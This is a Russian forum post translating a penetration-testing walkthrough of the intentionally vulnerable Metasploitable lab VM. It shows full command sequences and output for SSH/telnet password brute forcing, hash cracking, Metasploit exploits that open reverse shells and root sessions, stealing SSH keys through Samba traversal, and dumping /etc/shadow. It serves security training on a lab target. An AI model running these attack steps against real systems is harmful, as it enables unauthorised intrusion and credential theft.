• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Soft Анализ Metasploitable

Источник:
Перевод: Анна Давыдова
Руководство по эксплуатации Metasploitable

Metasploitable - Ubuntu 8.04, установленным на VMWare 6.5 с включенным в него пакетом уязвимостей, которые могут быть запущены на большей части программного обеспечения для виртуализации.

Вы можете получить свою копию на . Я использую Kali Linux для проведения виртуальных атак в .​

Сбор информации

Nmap является отличным инструментом для сканирования портов и поиска сетевых служб на машине.

Мы запустим nmap со следующими опциями:
  • -sV для исследования открытых портов для служб и информации о версии
  • -O для определения или попытки узнать операционную систему
  • -p1-65535 для выполнения законченного сканирования портов
Код:
root@kali:~# nmap -sV -O 192.168.0.14 -p1-65535
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-12 16:46 MDT
Nmap scan report for 192.168.0.14
Host is up (0.00073s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:EE:93:3E (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 21.34 seconds
Атака паролей и взлом хэшей

Сначала мы попытаемся атаковать слабые пароли и взломать любые хэши паролей, которые мы нашли, перед тем как попытаться расположить или использовать уязвимость на машине. В этой секции я собрал имена пользователей, пароли и хэши заранее, для того чтобы в лучшей степени продемонстрировать использование следующих инструментов.​

SSH Bruteforce

hydra является отличным инструментом для проведения брутфорс атаки на сетевые службы. Хотя bruteforce SSH является утомительным процессом, все еще важно знать, как это делается.

Мы запустим hydra используя опцию –C, чтобы пройти, выделенный двоеточиями файл, содержащий имя пользователя и пароль.
Код:
root@kali:~# hydra -C metasploitableuserpass.txt 192.168.0.14 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-12 17:10:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries, ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.0.14 login: msfadmin password: msfadmin
[22][ssh] host: 192.168.0.14 login: postgres password: postgres
[22][ssh] host: 192.168.0.14 login: service password: service
[22][ssh] host: 192.168.0.14 login: klog password: 123456789
[22][ssh] host: 192.168.0.14 login: user password: user
[22][ssh] host: 192.168.0.14 login: sys password: batman
1 of 1 target successfully completed, 6 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-12 17:10:04
Telnet Bruteforce

Мы можем использовать еще раз, чтобы провести брутфорс атаки на telnet службу, запущенную в системе. Мы снова используем -C опцию.
Код:
root@kali:~# hydra -C metasploitableuserpass.txt 192.168.0.14 telnet

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-12 20:27:15

[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available

[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries, ~0 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 192.168.0.14 login: user password: user
[23][telnet] host: 192.168.0.14 login: sys password: batman
[23][telnet] host: 192.168.0.14 login: klog password: 123456789
[23][telnet] host: 192.168.0.14 login: postgres password: postgres
[23][telnet] host: 192.168.0.14 login: msfadmin password: msfadmin
[23][telnet] host: 192.168.0.14 login: service password: service

1 of 1 target successfully completed, 6 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-12 20:27:20
Взлом хэшей

С взломанных SSH аккаунтов мы можем найти хэши паролей для аккаунтов на системе путем чтения содержимого /и т.д./ теневого файла и продолжить взламывать хэши, используя hashcat.

Мы используем -m опцию, чтобы указать тип хэша, который был обойден, и также добавить перечень возможных паролей, чтобы уменьшить время, необходимое для взлома хэша.
Код:
root@kali:~# hashcat -m 500 metasploitablehash.txt metasploitablepass.txt
Initializing hashcat v0.49 with 1 threads and 32mb segment-size...
Added hashes from file /root/metasploitablehash.txt: 7 (7 salts)

NOTE: press enter for status-screen

$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:batman
$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:123456789
$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:msfadmin
$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:user
$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:postgres
$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:service

Input.Mode: Dict (/root/metasploitablepass.txt)
Index.....: 1/1 (segment), 6 (words), 48 (bytes)
Recovered.: 6/7 hashes, 6/7 salts
Speed/sec.: - plains, - words
Progress..: 6/6 (100.00%)

Running...: --:--:--:--
Estimated.: --:--:--:--

Started: Fri Jun 12 17:01:19 2015
Stopped: Fri Jun 12 17:01:19 2015
Эксплуатация и преимущество расширения

Samba

Версия Samba, работающая на компьютере, является уязвимой к и может быть использована с помощью модуля .
Код:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.14 yes The target address
RPORT 139 yes The target port

Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.13 yes The listen address
LPORT 4444 yes The listen port

Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > run

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zvN93GNFfTvnAR16;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zvN93GNFfTvnAR16\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.0.13:4444 -> 192.168.0.14:43221) at 2015-06-12 17:26:04 -0600
id
uid=0(root) gid=0(root)
Версия Samba также уязвима к из-за присутствия перезаписываемой доли на системе, которая может быть идентифицирована, используя .
Код:
root@kali:~# enum4linux 192.168.0.14

WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 14 17:17:02 2015
==========================
| Target Information |
==========================
Target ........... 192.168.0.14
...

[+] Attempting to map shares on 192.168.0.14
//192.168.0.14/print$ Mapping: DENIED, Listing: N/A
//192.168.0.14/tmp Mapping: OK, Listing: OK
//192.168.0.14/opt Mapping: DENIED, Listing: N/A
...
Мы видим, что часть tmp перезаписывается и использует это для эксплуатации директории обхода уязвимости.
Код:
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.14 yes The target address
RPORT 445 yes Set the SMB service port
SMBSHARE tmp yes The name of a writeable share on the server
SMBTARGET rootfs yes The name of the directory that should point to the root filesystem

msf auxiliary(samba_symlink_traversal) > run

[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.0.14\tmp\rootfs\
[*] Auxiliary module execution completed
Теперь мы можем использовать команду для просмотра диска и сбора авторизированных SSH ключей для системы или даже для добавления наших известных ключей, как авторизированных.
Код:
root@kali:~# smbclient //192.168.0.14/tmp

Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs\/root/.ssh/

smb: \rootfs\root\.ssh\> get authorized_keys

getting file \rootfs\root\.ssh\authorized_keys of size 405 as authorized_keys (197.7 KiloBytes/sec) (average 197.8 KiloBytes/sec)

smb: \rootfs\root\.ssh\> ^C
root@kali:~# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Мы можем использовать эту информацию для эксплуатации Debian OpenSSH Predictable PRNG эксплойта, что описано далее в этой статье.​


distcc

Программа имеет триггер, который запускается как сетевая служба, которая уязвима к и может быть использована с помощью модуля Metasploit.
Код:
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.14 yes The target address
RPORT 3632 yes The target port

Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.13 yes The listen address
LPORT 4444 yes The listen port

Exploit target:
Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > run

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jjkbNNf5ZM9T9S8f;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jjkbNNf5ZM9T9S8f\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (192.168.0.13:4444 -> 192.168.0.14:41599) at 2015-06-12 17:30:07 -0600
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Apache Tomcat

Служба Apache Tomcat использует учетные данные по умолчанию tomcat/tomcat, которые позволяют нам разворачивать произвольные приложения JSP и получить оболочку на машине.

Мы можем эксплуатировать это, используя или . Единственное отличие между модулями заключается в том, что первый использует PUT запрос для загрузки пейлоад, в то время как последний использует POST запрос для /manager/html/upload приложений Tomcat для загрузки пейлоад.
Код:
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.0.14 yes The target address
RPORT 8180 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.13 yes The listen address
LPORT 4444 yes The listen port

Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > run

[*] Started reverse handler on 192.168.0.13:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6473 bytes as DW4jt5FInhZE9yysl2qFBXquq.war ...
[*] Executing /DW4jt5FInhZE9yysl2qFBXquq/4JE8SRGFoTspH3bDjPjRNHrqjdjHh.jsp...
[*] Undeploying DW4jt5FInhZE9yysl2qFBXquq ...
[*] Sending stage (30680 bytes) to 192.168.0.14
[*] Meterpreter session 7 opened (192.168.0.13:4444 -> 192.168.0.14:59015) at 2015-06-12 17:57:23 -0600

meterpreter > getuid

Server username: tomcat55

Apache httpd Webserver

Apache вебсервер не является уязвимым сам по себе, но он делает уязвимыми приложения. Мы можем использовать dirb, чтобы сканировать веб-сервер и расположить возможно уязвимые приложения.

Мы используем -r опцию вместе с dirb не для рекурсивного поиска в пределах директорий, а только для того, чтобы разместить уязвимые приложения. В обычных сканированиях рекурсивный поиск является отличным инструментом для расположения конфиденциальной информации или других спрятанных уязвимых приложений.
Код:
root@kali:~# dirb http://192.168.0.14 /usr/share/wordlists/dirb/big.txt -r
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Fri Jun 12 18:35:53 2015
URL_BASE: http://192.168.0.14/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 20458

---- Scanning URL: http://192.168.0.14/ ----
+ http://192.168.0.14/cgi-bin/ (CODE:403|SIZE:328)
+ http://192.168.0.14/index (CODE:200|SIZE:45)
+ http://192.168.0.14/phpinfo (CODE:200|SIZE:47560)
+ http://192.168.0.14/server-status (CODE:403|SIZE:333)
==> DIRECTORY: http://192.168.0.14/tikiwiki/
==> DIRECTORY: http://192.168.0.14/twiki/
-----------------
DOWNLOADED: 20458 - FOUND: 4
TikiWiki

У веб-приложения TikiWiki есть две уязвимости и .

Мы будем эксплуатировать обе эти уязвимости, используя второй модуль упомянутый ранее, который включает в себя эксплуатацию раскрытия информации.
Код:
msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > show options

Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.0.14 yes The target address
RPORT 80 yes The target port
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host

Exploit target:
Id Name
-- ----
0 Automatic

msf exploit(tikiwiki_graph_formula_exec) > run

[*] Started reverse handler on 192.168.0.13:4444
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :

db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki : tikiwiki195

[*] Attempting to execute our payload...
[*] Sending stage (40499 bytes) to 192.168.0.14
[*] Meterpreter session 8 opened (192.168.0.13:4444 -> 192.168.0.14:56372) at 2015-06-12 18:41:35 -0600

meterpreter > getuid

Server username: www-data (33)
Debian OpenSSH

Версия OpenSSH,запущенная на системе, является уязвимой для эксплуатации .

Для этого, нам будет необходимо получить список авторизированных ключей, который мы можем сделать, используя непривилегированную оболочку путем чтения файла /root/.ssh/authorized_keys.
Код:
cat /root/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Теперь, когда у нас есть авторизированный ключ, нам нужно обнаружить приватный ключ в паре с публичным авторизированным ключом. Мы можем получить архив взломанных пар ключей предоставляемых людьми на на их link removed.

После распаковки архива, мы можем расположить приватный ключ в паре с публичным и использовать его для SSH в качестве root пользователя.

Код:
root@kali:~/rsa/2048# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub

57c3115d77c56390332dc5c49978627a-5429.pub

root@kali:~# ssh -i /rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.0.14

Public key 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a blacklisted (see ssh-vulnkey(1)); continuing anyway

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# id

uid=0(root) gid=0(root) groups=0(root)
PostgreSQL

Служба PostgreSQL, запущенная на системе, использует учетные данные по умолчанию и может быть эксплуатирована для получения системной оболочки, используя Metasploit модуль.
Код:
msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOST 192.168.0.14 yes The target address
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.13 yes The listen address
LPORT 4444 yes The listen port

Exploit target:
Id Name
-- ----
0 Linux x86

msf exploit(postgres_payload) > run

[*] Started reverse handler on 192.168.0.13:4444
[*] 192.168.0.14:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/BpmBaUTU.so, should be cleaned up automatically
[*] Command shell session 3 opened (192.168.0.13:4444 -> 192.168.0.14:34466) at 2015-06-14 14:41:37 -0600
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

Преимущество расширения

Узнать версию ядра Linux можно путем запуска имени пользователя -a в оболочке Metasploitable на компьютере.
Код:
meterpreter > shell
Process 6071 created.
Channel 5 created.
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Эта версия ядра уязвима к .

Мы можем использовать соответствующий модуль Metasploit для использования этой уязвимости.
Код:
msf > use exploit/linux/local/udev_netlink
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

Name Current Setting Required Description
---- --------------- -------- -----------
NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect
SESSION 8 yes The session to run this module on.
WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)

Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(udev_netlink) > run

[*] Started reverse handler on 192.168.0.13:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2655
[+] Found netlink pid: 2654
[*] Writing payload executable (152 bytes) to /tmp/BSsWpWUGOB
[*] Writing exploit executable (1879 bytes) to /tmp/dFDoNsoNgO
[*] chmod'ing and running it...
[*] Command shell session 9 opened (192.168.0.13:4444 -> 192.168.0.14:56373) at 2015-06-12 18:45:17 -0600
id
uid=0(root) gid=0(root)

Пост эксплуатация

Хэши паролей

Как root пользователь, мы можем легко заполучить хэши паролей из машины.
Код:
root@metasploitable:~# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
Взлом базы данных MySQL

База данных MySQL на системе использует учетные данные корня по умолчанию и база данных может быть взломана с целью раскрытия конфиденциальных данных.
Код:
root@metasploitable:~# mysql -p

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 27
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.00 sec)

Взлом базы данных PostgreSQL

PostgreSQL, установленная на компьютере, также использует учетные данные postgres/postgres по умолчанию, и может быть взломана для раскрытия конфиденциальных данных. Чтобы получить доступ к этой базе данных, мы должны перейти к пользователю Postgres с паролем Postgres.
Код:
root@metasploitable:~# su postgres
postgres@metasploitable:/root$ psql -U postgres
Welcome to psql 8.3.1, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms
\h for help with SQL commands
\? for help with psql commands
\g or terminate with semicolon to execute query
\q to quit

postgres=# \l
List of databases
Name | Owner | Encoding
-----------+----------+----------
postgres | postgres | UTF8
template0 | postgres | UTF8
template1 | postgres | UTF8
(3 rows)
Примечания

Metasploitable является демо-платформой, которая подразумевает демонстрацию использования инструментов для эмулирования фактического пентеста и поэтому она имеет нулевую защиту и использует большое количество уязвимых приложений и учетных данных по умолчанию. Для сравнения, более реалистичные виртуальные машины для пентеста, можно найти на для изучения и получения практического опыта в сфере компьютерной и сетевой безопасности.​
 
S

Sniff

Будем старательно изучать. Спасибо.
 
K

kservice

Спасибо за статью, не могу найти metasploitableuserpass.txt, подскажите где его можно скачать.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!